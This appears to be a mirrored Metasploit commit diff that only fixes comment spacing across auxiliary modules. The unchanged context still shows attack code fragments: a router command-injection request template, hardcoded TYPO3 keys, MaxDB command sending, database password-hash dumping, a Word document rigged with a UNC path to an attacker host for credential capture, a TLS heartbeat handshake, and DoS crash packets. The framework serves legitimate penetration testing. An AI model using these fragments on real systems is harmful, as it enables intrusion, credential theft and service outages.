1
mirror of https://github.com/rapid7/metasploit-framework synced 2024-10-29 18:07:27 +01:00

yard doc and comment corrections for auxiliary

This commit is contained in:
root 2015-04-03 16:12:23 +05:00
parent 0dd987d873
commit 4bd40fed7f
129 changed files with 476 additions and 590 deletions

View File

@ -52,7 +52,7 @@ class Metasploit3 < Msf::Auxiliary
return
end
#check to see if we get HTTP OK
# check to see if we get HTTP OK
if (res.code == 200)
print_status("Okay, Got an HTTP 200 (okay) code. Verifying Server header")
else
@ -60,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary
return
end
#Check to verify server reported is a 2wire router
# Check to verify server reported is a 2wire router
if (res.headers['Server'].match(/2wire Gateway/i))
print_status("Server is a 2wire Gateway! Grabbing info\n")
else
@ -88,7 +88,7 @@ class Metasploit3 < Msf::Auxiliary
print_status("Hardware Version: #{hardware}")
end
#Check the Software Version
# Check the Software Version
if res.body.match(/<td class="data">(5\.\d{1,3}\.\d{1,3}\.\d{1,3})<\/td>/i)
ver = $1
print_status("Software version: #{ver}")

View File

@ -71,9 +71,9 @@ class Metasploit3 < Msf::Auxiliary
print_status("#{rhost}:#{rport} - Sending remote command: " + datastore['CMD'])
cmd = datastore['CMD']
#original post request:
#data_cmd = "submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&
#action=&commit=0&ping_ip=1.1.1.1&ping_size=%26#{cmd}%26&ping_times=5&traceroute_ip="
# original post request:
# data_cmd = "submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&
# action=&commit=0&ping_ip=1.1.1.1&ping_size=%26#{cmd}%26&ping_times=5&traceroute_ip="
vprint_status("#{rhost}:#{rport} - using the following target URL: #{uri}")
begin

View File

@ -20,8 +20,8 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' =>
[
'Craig Heffner', #vulnerability discovery and original exploit
'Michael Messner <devnull[at]s3cur1ty.de>' #metasploit module
'Craig Heffner', # vulnerability discovery and original exploit
'Michael Messner <devnull[at]s3cur1ty.de>' # metasploit module
],
'License' => MSF_LICENSE,
'References' =>

View File

@ -130,7 +130,7 @@ class Metasploit3 < Msf::Auxiliary
return false
end
when 302
#Success!
# Success!
return true
else
print_error("ERROR: received code #{res.code}")

View File

@ -100,20 +100,20 @@ class Metasploit4 < Msf::Auxiliary
else
print_status("Rotating through known encryption keys")
encryption_keys = [
#TYPO3 4.3.x - 4.4.x
# TYPO3 4.3.x - 4.4.x
'd696ab49a803d7816021cb1768a6917d',
'47d1e990583c9c67424d369f3414728e6793d9dc2ae3429d488a7374bc85d2a0b19b62de67d46a6079a75f10934288d3',
'7b13b2203029ed80337f27127a9f1d28c2597f4c08c9a07b782b674731ecf5328c4d900851957899acdc6d4f911bf8b7',
#TYPO3 4.4.7+
# TYPO3 4.4.7+
'fbbdebd9091d914b3cd523485afe7b03e6006ade4125e4cf4c46195b3cecbb9ae0fe0f7b5a9e72ea2ac5f17b66f5abc7',
#TYPO3 4.5.0
# TYPO3 4.5.0
'def76f1d8139304b7edea83b5f40201088ba70b20feabd8b2a647c4e71774b7b0e4086e4039abaf5d4f6a521f922e8a2',
'bac0112e14971f00431639342415ff22c3c3bf270f94175b8741c0fa95df244afb61e483c2facf63cffc320ed61f2731',
#TYPO3 4.5.2
# TYPO3 4.5.2
'14b1225e2c277d55f54d18665791f114f4244f381113094e2a19dfb680335d842e10460995eb653d105a562a5415d9c7',
#TYPO3 4.5.3
# TYPO3 4.5.3
'5d4eede80d5cec8df159fd869ec6d4041cd2fc0136896458735f8081d4df5c22bbb0665ddac56056023e01fbd4ab5283',
#TYPO3 4.5.4 - 4.5.7
# TYPO3 4.5.4 - 4.5.7
'b2aae63def4c512ce8f4386e57b8a48b40312de30775535cbff60a6eab356809a0b596edaad49c725d9963d93aa2ffae',
]
end

View File

@ -37,7 +37,7 @@ class Metasploit3 < Msf::Auxiliary
def run
connect
#Grab the MaxDB info.
# Grab the MaxDB info.
pdbmsrv = "\x5A\x00\x00\x00\x03\x5B\x00\x00\x01\x00\x00\x00\xFF\xFF\xFF\xFF"
pdbmsrv << "\x00\x00\x04\x00\x5A\x00\x00\x00\x00\x02\x42\x00\x04\x09\x00\x00"
pdbmsrv << "\x00\x40\x00\x00\xD0\x3F\x00\x00\x00\x40\x00\x00\x70\x00\x00\x00"
@ -60,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary
print_status(info)
end
#Send our command.
# Send our command.
len = 39 + datastore['CMD'].length
data = len.chr + "\x00\x00\x00\x03\x3F\x00\x00\x01\x00\x00\x00\x54\x0D\x00\x00"

View File

@ -47,8 +47,8 @@ class Metasploit3 < Msf::Auxiliary
'License' => MSF_LICENSE,
'Author' =>
[
'Eloi Vanderbeken <eloi.vanderbeken[at]gmail.com>', #Initial discovery, poc
'Matt "hostess" Andreko <mandreko[at]accuvant.com>' #Msf module
'Eloi Vanderbeken <eloi.vanderbeken[at]gmail.com>', # Initial discovery, poc
'Matt "hostess" Andreko <mandreko[at]accuvant.com>' # Msf module
],
'References' =>
[
@ -174,7 +174,7 @@ class Metasploit3 < Msf::Auxiliary
unless length == data.length
vprint_warning("#{peer} - Inconsistent length / data packet")
#return nil
# return nil
end
return { :length => length, :data => data }

View File

@ -48,8 +48,8 @@ class Metasploit3 < Msf::Auxiliary
:type => 'MSSQL_ENUM',
:data => "Version: #{sqlversion}")
#-------------------------------------------------------
#Check Configuration Parameters and check what is enabled
#---------------------------------------------------------
# Check Configuration Parameters and check what is enabled
print_status("Configuration Parameters:")
if vernum.join != "2000"
query = "SELECT name, CAST(value_in_use AS INT) from sys.configurations"
@ -59,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary
sysconfig[l[0].strip] = l[1].to_i
end
else
#enable advanced options
# enable advanced options
mssql_query("EXEC sp_configure \'show advanced options\', 1; RECONFIGURE")[:rows]
query = "EXECUTE sp_configure"
ver = mssql_query(query)[:rows]
@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary
end
#-------------------------------------------------------
#checking for C2 Audit Mode
# checking for C2 Audit Mode
if sysconfig['c2 audit mode'] == 1
print_status("\tC2 Audit Mode is Enabled")
report_note(:host => datastore['RHOST'],
@ -89,7 +89,7 @@ class Metasploit3 < Msf::Auxiliary
end
#-------------------------------------------------------
#check if xp_cmdshell is enabled
# check if xp_cmdshell is enabled
if vernum.join != "2000"
if sysconfig['xp_cmdshell'] == 1
print_status("\txp_cmdshell is Enabled")
@ -126,7 +126,7 @@ class Metasploit3 < Msf::Auxiliary
end
#-------------------------------------------------------
#check if remote access is enabled
# check if remote access is enabled
if sysconfig['remote access'] == 1
print_status("\tremote access is Enabled")
report_note(:host => datastore['RHOST'],
@ -162,7 +162,7 @@ class Metasploit3 < Msf::Auxiliary
end
#-------------------------------------------------------
#check if Mail stored procedures are enabled
# check if Mail stored procedures are enabled
if vernum.join != "2000"
if sysconfig['Database Mail XPs'] == 1
print_status("\tDatabase Mail XPs is Enabled")
@ -199,7 +199,7 @@ class Metasploit3 < Msf::Auxiliary
end
#-------------------------------------------------------
#check if OLE stored procedures are enabled
# check if OLE stored procedures are enabled
if vernum.join != "2000"
if sysconfig['Ole Automation Procedures'] == 1
print_status("\tOle Automation Procedures are Enabled")
@ -451,7 +451,7 @@ class Metasploit3 < Msf::Auxiliary
end
#-------------------------------------------------------
#Check for local accounts with same username as password
# Check for local accounts with same username as password
sameasuser = []
if vernum.join != "2000"
sameasuser = mssql_query("SELECT name FROM sys.sql_logins WHERE PWDCOMPARE\(name, password_hash\) = 1")[:rows]
@ -479,7 +479,7 @@ class Metasploit3 < Msf::Auxiliary
end
#-------------------------------------------------------
#Check for local accounts with empty password
# Check for local accounts with empty password
blankpass = []
if vernum.join != "2000"
blankpass = mssql_query("SELECT name FROM sys.sql_logins WHERE PWDCOMPARE\(\'\', password_hash\) = 1")[:rows]
@ -507,7 +507,7 @@ class Metasploit3 < Msf::Auxiliary
end
#-------------------------------------------------------
#Check for dangerous stored procedures
# Check for dangerous stored procedures
fountsp = []
dangeroussp = [
'sp_createorphan',
@ -732,7 +732,7 @@ EOS
end
#-------------------------------------------------------
#Enumerate Instances
# Enumerate Instances
instances =[]
if vernum.join != "2000"
querykey = "EXEC master..xp_regenumvalues \'HKEY_LOCAL_MACHINE\',\'SOFTWARE\\Microsoft\\Microsoft SQL Server\\Instance Names\\SQL\'"
@ -769,7 +769,7 @@ EOS
end
#---------------------------------------------------------
#Enumerate under what accounts the instance services are running under
# Enumerate under what accounts the instance services are running under
print_status("Default Server Instance SQL Server Service is running under the privilege of:")
privdflt = mssql_query("EXEC master..xp_regread \'HKEY_LOCAL_MACHINE\' ,\'SYSTEM\\CurrentControlSet\\Services\\MSSQLSERVER\',\'ObjectName\'")[:rows]
if privdflt != nil

View File

@ -150,7 +150,7 @@ class Metasploit3 < Msf::Auxiliary
return nil
end
#Parse results
# Parse results
parsed_result = res.body.scan(/#{clue_start}(.*?)#{clue_end}/m)
if parsed_result && !parsed_result.empty?

View File

@ -53,12 +53,12 @@ class Metasploit3 < Msf::Auxiliary
def sql_statement()
#DEFINED HEADER TEXT
# DEFINED HEADER TEXT
headings = [
["Server","Database", "Schema", "Table", "Column", "Data Type", "Sample Data","Row Count"]
]
#DEFINE SEARCH QUERY AS VARIABLE
# DEFINE SEARCH QUERY AS VARIABLE
sql = "
-- CHECK IF VERSION IS COMPATABLE = > than 2000
IF (SELECT SUBSTRING(CAST(SERVERPROPERTY('ProductVersion') as VARCHAR), 1,
@ -341,11 +341,11 @@ class Metasploit3 < Msf::Auxiliary
#STATUSING
# STATUSING
print_line(" ")
print_status("Attempting to connect to the SQL Server at #{rhost}:#{rport}...")
#CREATE DATABASE CONNECTION AND SUBMIT QUERY WITH ERROR HANDLING
# CREATE DATABASE CONNECTION AND SUBMIT QUERY WITH ERROR HANDLING
begin
result = mssql_query(sql, false) if mssql_login_datastore
column_data = result[:rows]
@ -355,14 +355,14 @@ class Metasploit3 < Msf::Auxiliary
return
end
#CREATE TABLE TO STORE SQL SERVER DATA LOOT
# CREATE TABLE TO STORE SQL SERVER DATA LOOT
sql_data_tbl = Rex::Ui::Text::Table.new(
'Header' => 'SQL Server Data',
'Indent' => 1,
'Columns' => ['Server', 'Database', 'Schema', 'Table', 'Column', 'Data Type', 'Sample Data', 'Row Count']
)
#STATUSING
# STATUSING
print_status("Attempting to retrieve data ...")
if (column_data.count < 7)
@ -386,7 +386,7 @@ class Metasploit3 < Msf::Auxiliary
print_line(" ")
end
#SETUP ROW WIDTHS
# SETUP ROW WIDTHS
widths = [0, 0, 0, 0, 0, 0, 0, 0]
(column_data|headings).each { |row|
0.upto(7) { |col|
@ -394,7 +394,7 @@ class Metasploit3 < Msf::Auxiliary
}
}
#PRINT HEADERS
# PRINT HEADERS
buffer1 = ""
buffer2 = ""
headings.each { |row|
@ -406,7 +406,7 @@ class Metasploit3 < Msf::Auxiliary
buffer2 = buffer2.chomp(",")+ "\n"
}
#PRINT DIVIDERS
# PRINT DIVIDERS
buffer1 = ""
buffer2 = ""
headings.each { |row|
@ -417,7 +417,7 @@ class Metasploit3 < Msf::Auxiliary
print_line(buffer1)
}
#PRINT DATA
# PRINT DATA
buffer1 = ""
buffer2 = ""
print_line("")
@ -429,7 +429,7 @@ class Metasploit3 < Msf::Auxiliary
print_line(buffer1)
buffer2 = buffer2.chomp(",")+ "\n"
#WRITE QUERY OUTPUT TO TEMP REPORT TABLE
# WRITE QUERY OUTPUT TO TEMP REPORT TABLE
sql_data_tbl << [row[0], row[1], row[2], row[3], row[4], row[5], row[6], row[7]]
buffer1 = ""
@ -448,7 +448,7 @@ class Metasploit3 < Msf::Auxiliary
)
end
#CONVERT TABLE TO CSV AND WRITE TO FILE
# CONVERT TABLE TO CSV AND WRITE TO FILE
if (save_loot=="yes")
filename= "#{datastore['RHOST']}-#{datastore['RPORT']}_sqlserver_query_results.csv"
path = store_loot("mssql.data", "text/plain", datastore['RHOST'], sql_data_tbl.to_csv, filename, "SQL Server query results",this_service)

View File

@ -32,11 +32,11 @@ class Metasploit3 < Msf::Auxiliary
print_status("Running MySQL Enumerator...")
print_status("Enumerating Parameters")
#-------------------------------------------------------
#getting all variables
# getting all variables
vparm = {}
res = mysql_query("show variables") || []
res.each do |row|
#print_status(" | #{row.join(" | ")} |")
# print_status(" | #{row.join(" | ")} |")
vparm[row[0]] = row[1]
end
@ -77,7 +77,7 @@ class Metasploit3 < Msf::Auxiliary
query = "use mysql"
mysql_query(query)
#Account Enumeration
# Account Enumeration
# Enumerate all accounts with their password hashes
print_status("Enumerating Accounts:")
query = "select user, host, password from mysql.user"

View File

@ -39,7 +39,7 @@ class Metasploit3 < Msf::Auxiliary
begin
print_status("Sending statement: '#{query}'...")
result = prepare_exec(query)
#Need this if 'cause some statements won't return anything
# Need this if statement because some statements won't return anything
if result
result.each do |line|
print_status(line)

View File

@ -29,7 +29,7 @@ class Metasploit3 < Msf::Auxiliary
return if not check_dependencies
begin
#Get all values from v$parameter
# Get all values from v$parameter
query = 'select name,value from v$parameter'
vparm = {}
params = prepare_exec(query)
@ -47,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary
print_status("Running Oracle Enumeration....")
#Version Check
# Version Check
query = 'select * from v$version'
ver = prepare_exec(query)
print_status("The versions of the Components are:")
@ -64,11 +64,11 @@ class Metasploit3 < Msf::Auxiliary
)
end
#Saving Major Release Number for other checks
# Saving Major Release Number for other checks
majorrel = ver[0].scan(/Edition Release (\d*)./)
#-------------------------------------------------------
#Audit Check
# Audit Check
print_status("Auditing:")
begin
if vparm["audit_trail"] == "NONE"
@ -122,7 +122,7 @@ class Metasploit3 < Msf::Auxiliary
end
#-------------------------------------------------------
#Security Settings
# Security Settings
print_status("Security Settings:")
begin
@ -201,7 +201,7 @@ class Metasploit3 < Msf::Auxiliary
end
#-------------------------------------------------------
#Password Policy
# Password Policy
print_status("Password Policy:")
begin
query = %Q|

View File

@ -133,7 +133,7 @@ class Metasploit3 < Msf::Auxiliary
end
#check if our process is done using these files
# check if our process is done using these files
def exclusive_access(*files)
simple.connect("\\\\#{@ip}\\#{@smbshare}")
files.each do |file|

View File

@ -57,7 +57,7 @@ class Metasploit3 < Msf::Auxiliary
@smbshare = datastore['SMBSHARE']
# Try and connect
if connect
#Try and authenticate with given credentials
# Try and authenticate with given credentials
begin
smb_login
rescue StandardError => autherror

View File

@ -64,10 +64,10 @@ class Metasploit3 < Msf::Auxiliary
n = 0
c = 0
#puts "body is #{res.body.length} bytes"
# puts "body is #{res.body.length} bytes"
infos = res.body.split(/\r?\n/)
infos.each do |row|
#puts row.inspect
# puts row.inspect
if (c < 6)
if (row.match(/\["file"\]=>/))
c+=1

View File

@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
def run
cracker = new_john_cracker
#generate our wordlist and close the file handle
# generate our wordlist and close the file handle
wordlist = wordlist_file
wordlist.close
print_status "Wordlist file written out to #{wordlist.path}"

View File

@ -45,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary
cracker = new_john_cracker
#generate our wordlist and close the file handle
# generate our wordlist and close the file handle
wordlist = wordlist_file
wordlist.close
print_status "Wordlist file written out to #{wordlist.path}"

View File

@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
@formats = Set.new
cracker = new_john_cracker
#generate our wordlist and close the file handle
# generate our wordlist and close the file handle
wordlist = wordlist_file
wordlist.close
print_status "Wordlist file written out to #{wordlist.path}"

View File

@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
def run
cracker = new_john_cracker
#generate our wordlist and close the file handle
# generate our wordlist and close the file handle
wordlist = wordlist_file
wordlist.close
print_status "Wordlist file written out to #{wordlist.path}"

View File

@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary
hash_list = hash_file
#generate our wordlist and close the file handle
# generate our wordlist and close the file handle
wordlist = wordlist_file
wordlist.close

View File

@ -49,29 +49,29 @@ class Metasploit3 < Msf::Auxiliary
bnatmac = arp2(bnatip,outint)
print_line("Obtained BNAT MAC: #{bnatmac}\n\n")
#Create Interface Specific Configs
# Create Interface Specific Configs
outconfig = PacketFu::Config.new(PacketFu::Utils.ifconfig ":#{outint}").config
inconfig = PacketFu::Config.new(PacketFu::Utils.ifconfig ":#{inint}").config
#Set Captures for Traffic coming from Outside and from Inside respectively
# Set Captures for Traffic coming from Outside and from Inside respectively
outpcap = PacketFu::Capture.new( :iface => "#{outint}", :start => true, :filter => "tcp and src #{bnatip}" )
print_line("Now listening on #{outint}...")
inpcap = PacketFu::Capture.new( :iface => "#{inint}", :start => true, :filter => "tcp and src #{clientip} and dst #{serverip}" )
print_line("Now listening on #{inint}...\n\n")
#Start Thread from Outside Processing
# Start Thread from Outside Processing
fromout = Thread.new do
loop do
outpcap.stream.each do |pkt|
packet = PacketFu::Packet.parse(pkt)
#Build a shell packet that will never hit the wire as a hack to get desired mac's
# Build a shell packet that will never hit the wire as a hack to get desired mac's
shell_pkt = PacketFu::TCPPacket.new(:config => inconfig, :timeout => 0.1, :flavor => "Windows")
shell_pkt.ip_daddr = clientip
shell_pkt.recalc
#Mangle Received Packet and Drop on the Wire
# Mangle Received Packet and Drop on the Wire
packet.ip_saddr = serverip
packet.ip_daddr = clientip
packet.eth_saddr = shell_pkt.eth_saddr
@ -84,7 +84,7 @@ class Metasploit3 < Msf::Auxiliary
end
end
#Start Thread from Inside Processing
# Start Thread from Inside Processing
fromin = Thread.new do
loop do
inpcap.stream.each do |pkt|
@ -98,19 +98,19 @@ class Metasploit3 < Msf::Auxiliary
packet.eth_daddr = bnatmac
end
#Build a shell packet that will never hit the wire as a hack to get desired mac's
# Build a shell packet that will never hit the wire as a hack to get desired mac's
shell_pkt = PacketFu::TCPPacket.new(:config=>outconfig, :timeout=> 0.1, :flavor=>"Windows")
shell_pkt.ip_daddr = serverip
shell_pkt.recalc
#Mangle Received Packet and Drop on the Wire
# Mangle Received Packet and Drop on the Wire
packet.eth_saddr = shell_pkt.eth_saddr
packet.ip_saddr=shell_pkt.ip_saddr
packet.recalc
inj = PacketFu::Inject.new( :iface => "#{outint}", :config =>outconfig )
inj.a2w(:array => [packet.to_s])
#Trigger Cisco SPI Vulnerability by Double-tapping the SYN
# Trigger Cisco SPI Vulnerability by Double-tapping the SYN
if packet.tcp_flags.syn == 1 && packet.tcp_flags.ack == 0
select(nil, nil, nil, 0.75)
inj.a2w(:array => [packet.to_s])

View File

@ -53,7 +53,7 @@ class Metasploit3 < Msf::Auxiliary
], self.class)
end
#here we create an empty .docx file with the UNC path. Only done when FILENAME is empty
# here we create an empty .docx file with the UNC path. Only done when FILENAME is empty
def make_new_file
metadata_file_data = ""
metadata_file_data << "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?><cp:coreProperties"
@ -65,12 +65,12 @@ class Metasploit3 < Msf::Auxiliary
metadata_file_data << "2013-01-08T14:14:00Z</dcterms:created><dcterms:modified xsi:type=\"dcterms:W3CDTF\">"
metadata_file_data << "2013-01-08T14:14:00Z</dcterms:modified></cp:coreProperties>"
#where to find the skeleton files required for creating an empty document
# where to find the skeleton files required for creating an empty document
data_dir = File.join(Msf::Config.data_directory, "exploits", "docx")
zip_data = {}
#add skeleton files
# add skeleton files
vprint_status("Adding skeleton files from #{data_dir}")
Dir["#{data_dir}/**/**"].each do |file|
if not File.directory?(file)
@ -78,19 +78,19 @@ class Metasploit3 < Msf::Auxiliary
end
end
#add on-the-fly created documents
# add on-the-fly created documents
vprint_status("Adding injected files")
zip_data["docProps/core.xml"] = metadata_file_data
zip_data["word/_rels/settings.xml.rels"] = @rels_file_data
#add the otherwise skipped "hidden" file
# add the otherwise skipped "hidden" file
file = "#{data_dir}/_rels/.rels"
zip_data[file.sub(data_dir,'')] = File.read(file)
#and lets create the file
# and lets create the file
zip_docx(zip_data)
end
#here we inject an UNC path into an existing file, and store the injected file in FILENAME
# here we inject an UNC path into an existing file, and store the injected file in FILENAME
def manipulate_file
ref = "<w:attachedTemplate r:id=\"rId1\"/>"
@ -99,24 +99,24 @@ class Metasploit3 < Msf::Auxiliary
return nil
end
#lets extract our docx and store it in memory
# lets extract our docx and store it in memory
zip_data = unzip_docx
#file to check for reference file we need
# file to check for reference file we need
file_content = zip_data["word/settings.xml"]
if file_content.nil?
print_error("Bad \"word/settings.xml\" file, check if it is a valid .docx.")
return nil
end
#if we can find the reference to our inject file, we don't need to add it and can just inject our unc path.
# if we can find the reference to our inject file, we don't need to add it and can just inject our unc path.
if not file_content.index("w:attachedTemplate r:id=\"rId1\"").nil?
vprint_status("Reference to rels file already exists in settings file, we dont need to add it :)")
zip_data["word/_rels/settings.xml.rels"] = @rels_file_data
# lets zip the end result
zip_docx(zip_data)
else
#now insert the reference to the file that will enable our malicious entry
# now insert the reference to the file that will enable our malicious entry
insert_one = file_content.index("<w:defaultTabStop")
if insert_one.nil?
@ -135,16 +135,16 @@ class Metasploit3 < Msf::Auxiliary
return nil
end
#update the files that contain the injection and reference
# update the files that contain the injection and reference
zip_data["word/settings.xml"] = file_content
zip_data["word/_rels/settings.xml.rels"] = @rels_file_data
#lets zip the file
# lets zip the file
zip_docx(zip_data)
end
return 0
end
#making the actual docx from the hash
# making the actual docx from the hash
def zip_docx(zip_data)
docx = Rex::Zip::Archive.new
zip_data.each_pair do |k,v|
@ -153,11 +153,11 @@ class Metasploit3 < Msf::Auxiliary
file_create(docx.pack)
end
#unzip the .docx document. sadly Rex::zip does not uncompress so we do it the Rubyzip way
# unzip the .docx document. sadly Rex::zip does not uncompress so we do it the Rubyzip way
def unzip_docx
#Ruby sometimes corrupts the document when manipulating inside a compressed document, so we extract it with Zip::File
# Ruby sometimes corrupts the document when manipulating inside a compressed document, so we extract it with Zip::File
vprint_status("Extracting #{datastore['SOURCE']} into memory.")
#we read it all into memory
# we read it all into memory
zip_data = Hash.new
begin
Zip::File.open(datastore['SOURCE']) do |filezip|
@ -174,7 +174,7 @@ class Metasploit3 < Msf::Auxiliary
def run
#we need this in make_new_file and manipulate_file
# we need this in make_new_file and manipulate_file
@rels_file_data = ""
@rels_file_data << "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>".chomp
@rels_file_data << "<Relationships xmlns=\"http://schemas.openxmlformats.org/package/2006/relationships\">".chomp
@ -182,11 +182,11 @@ class Metasploit3 < Msf::Auxiliary
@rels_file_data << "attachedTemplate\" Target=\"file://\\\\#{datastore['LHOST']}\\normal.dot\" TargetMode=\"External\"/></Relationships>"
if "#{datastore['SOURCE']}" == ""
#make an empty file
# make an empty file
print_status("Creating empty document that points to #{datastore['LHOST']}.")
make_new_file
else
#extract the word/settings.xml and edit in the reference we need
# extract the word/settings.xml and edit in the reference we need
print_status("Injecting UNC path into existing document.")
if manipulate_file.nil?
print_error("Failed to create a document from #{datastore['SOURCE']}.")

View File

@ -58,8 +58,8 @@ class Metasploit4 < Msf::Auxiliary
}
# XXX: There is rarely, if ever, a need for a 'for' loop in Ruby
# This should be rewritten with 1.upto() or Enumerable#each or
# something
# This should be rewritten with 1.upto() or Enumerable#each or
# something
for x in 1..datastore['RLIMIT']
print_status("Sending request #{x} to #{peer}")
begin

View File

@ -21,9 +21,9 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' =>
[
'Steve Jones', #original discoverer
'Hoagie <andi[at]void.at>', #original public exploit
'Paulino Calderon <calderon[at]websec.mx>', #metasploit module
'Steve Jones', # original discoverer
'Hoagie <andi[at]void.at>', # original public exploit
'Paulino Calderon <calderon[at]websec.mx>', # metasploit module
],
'License' => MSF_LICENSE,
'References' =>

View File

@ -51,9 +51,9 @@ class Metasploit3 < Msf::Auxiliary
dcerpc_bind(handle)
print_status("Bound to #{handle} ...")
# Linux: Needs heap magic to work around glibc (or TALLOC mode for 3.0.20+)
# Linux: Needs heap magic to work around glibc (or TALLOC mode for 3.0.20+)
# Mac OS X: PC control via memcpy to stack ptr
# Solaris: PC control via memcpy to stack ptr
# Solaris: PC control via memcpy to stack ptr
stub = lsa_open_policy(dcerpc)
stub << NDR.long(1)

View File

@ -42,32 +42,32 @@ class Metasploit4 < Msf::Auxiliary
def run
# Client Hello
p1 = "\x16" # Content Type: Handshake
p1 = "\x16" # Content Type: Handshake
p1 << "\x03\x01" # Version: TLS 1.0
p1 << "\x00\x7e" # Length: 126
p1 << "\x01" # Handshake Type: Client Hello
p1 << "\x01" # Handshake Type: Client Hello
p1 << "\x00\x00\x7a" # Length: 122
p1 << "\x03\x02" # Version: TLS 1.1
p1 << ("A" * 32) # Random
p1 << "\x00" # Session ID Length: 0
p1 << "\x00" # Session ID Length: 0
p1 << "\x00\x08" # Cypher Suites Length: 6
p1 << "\xc0\x13" # - ECDHE-RSA-AES128-SHA
p1 << "\x00\x39" # - DHE-RSA-AES256-SHA
p1 << "\x00\x35" # - AES256-SHA
p1 << "\x00\xff" # - EMPTY_RENEGOTIATION_INFO_SCSV
p1 << "\x01" # Compression Methods Length: 1
p1 << "\x00" # - NULL-Compression
p1 << "\x01" # Compression Methods Length: 1
p1 << "\x00" # - NULL-Compression
p1 << "\x00\x49" # Extensions Length: 73
p1 << "\x00\x0b" # - Extension: ec_point_formats
p1 << "\x00\x04" # Length: 4
p1 << "\x03" # EC Points Format Length: 3
p1 << "\x00" # - uncompressed
p1 << "\x01" # - ansiX962_compressed_prime
p1 << "\x02" # - ansiX962_compressed_char2
p1 << "\x03" # EC Points Format Length: 3
p1 << "\x00" # - uncompressed
p1 << "\x01" # - ansiX962_compressed_prime
p1 << "\x02" # - ansiX962_compressed_char2
p1 << "\x00\x0a" # - Extension: elliptic_curves
p1 << "\x00\x34" # Length: 52
p1 << "\x00\x32" # Elliptic Curves Length: 50
# 25 Elliptic curves:
# 25 Elliptic curves:
p1 << "\x00\x0e\x00\x0d\x00\x19\x00\x0b\x00\x0c\x00\x18\x00\x09\x00\x0a"
p1 << "\x00\x16\x00\x17\x00\x08\x00\x06\x00\x07\x00\x14\x00\x15\x00\x04"
p1 << "\x00\x05\x00\x12\x00\x13\x00\x01\x00\x02\x00\x03\x00\x0f\x00\x10"
@ -77,7 +77,7 @@ class Metasploit4 < Msf::Auxiliary
p1 << "\x00\x00" # Length: 0
p1 << "\x00\x0f" # - Extension: Heartbeat
p1 << "\x00\x01" # Length: 1
p1 << "\x01" # Peer allowed to send requests
p1 << "\x01" # Peer allowed to send requests
# Change Cipher Spec Message
@ -97,12 +97,12 @@ class Metasploit4 < Msf::Auxiliary
# Client Key Exchange, Change Cipher Spec, Encrypted Handshake
# AES256-SHA
p2_aes_sha = "\x16" # Content Type: Handshake
p2_aes_sha << "\x03\x02" # Version: TLS 1.1
p2_aes_sha << "\x01\x06" # Length: 262
p2_aes_sha << "\x03\x02" # Version: TLS 1.1
p2_aes_sha << "\x01\x06" # Length: 262
p2_aes_sha << "\x10" # Handshake Type: Client Key Exchange
p2_aes_sha << "\x00\x01\x02" # Length: 258
p2_aes_sha << "\x01\x00" # Encrypted PreMaster Length: 256
p2_aes_sha << ("\x00" * 256) # Encrypted PresMaster (irrelevant)
p2_aes_sha << "\x00\x01\x02" # Length: 258
p2_aes_sha << "\x01\x00" # Encrypted PreMaster Length: 256
p2_aes_sha << ("\x00" * 256) # Encrypted PresMaster (irrelevant)
p2_aes_sha << p2_cssm # Change Cipher Spec Message
p2_aes_sha << p2_ehm # Encrypted Handshake Message
@ -112,7 +112,7 @@ class Metasploit4 < Msf::Auxiliary
p2_dhe << "\x03\x02" # Version: TLS 1.1
p2_dhe << "\x00\x46" # Length: 70
p2_dhe << "\x10" # Handshake Type: Client Key Exchange
p2_dhe << "\x00\x00\x42" # Length: 66
p2_dhe << "\x00\x00\x42" # Length: 66
p2_dhe << "\x00\x40" # DH Pubkey Length: 64
p2_dhe << ("A" * 64) # DH Pubkey
p2_dhe << p2_cssm # Change Cipher Spec Message
@ -124,9 +124,9 @@ class Metasploit4 < Msf::Auxiliary
p2_ecdhe << "\x03\x02" # Version: TLS 1.1
p2_ecdhe << "\x00\x46" # Length: 70
p2_ecdhe << "\x10" # Handshake Type: Client Key Exchange
p2_ecdhe << "\x00\x00\x42" # Length: 66
p2_ecdhe << "\x00\x00\x42" # Length: 66
p2_ecdhe << "\x41" # EC DH Pubkey Length: 65
# EC DH Pubkey:
# EC DH Pubkey:
p2_ecdhe << "\x04\x2f\x22\xf4\x06\x3f\xa1\xf7\x3d\xb6\x55\xbc\x68\x65\x57\xd8"
p2_ecdhe << "\x03\xe5\xaa\x36\xeb\x0f\x52\x5a\xaf\xd0\x9f\xf8\xc7\xfe\x09\x69"
p2_ecdhe << "\x5b\x38\x95\x58\xb6\x0d\x27\x53\xe9\x63\xcb\x96\xb3\x54\x47\xa6"

View File

@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary
end
def run
#Attempt to crash IIS FTP
# Attempt to crash IIS FTP
begin
return unless connect_login
print_status('Checking if there is at least one directory ...')

View File

@ -21,9 +21,9 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' =>
[
'x000 <3d3n[at]hotmail.com.br>', #Initial disclosure/exploit
'C4SS!0 G0M3S <Louredo_[at]hotmail.com>', #Metasploit submission
'sinn3r', #Metasploit edit/commit
'x000 <3d3n[at]hotmail.com.br>', # Initial disclosure/exploit
'C4SS!0 G0M3S <Louredo_[at]hotmail.com>', # Metasploit submission
'sinn3r', # Metasploit edit/commit
],
'License' => MSF_LICENSE,
'References' =>

View File

@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
end
def run
#Send HELLO to target
# Send HELLO to target
connect_udp
print_status("Sending Crash request...")
udp_sock.put("HELLO0.83\0")
@ -44,13 +44,13 @@ class Metasploit3 < Msf::Auxiliary
return
end
#Send DOS packet
# Send DOS packet
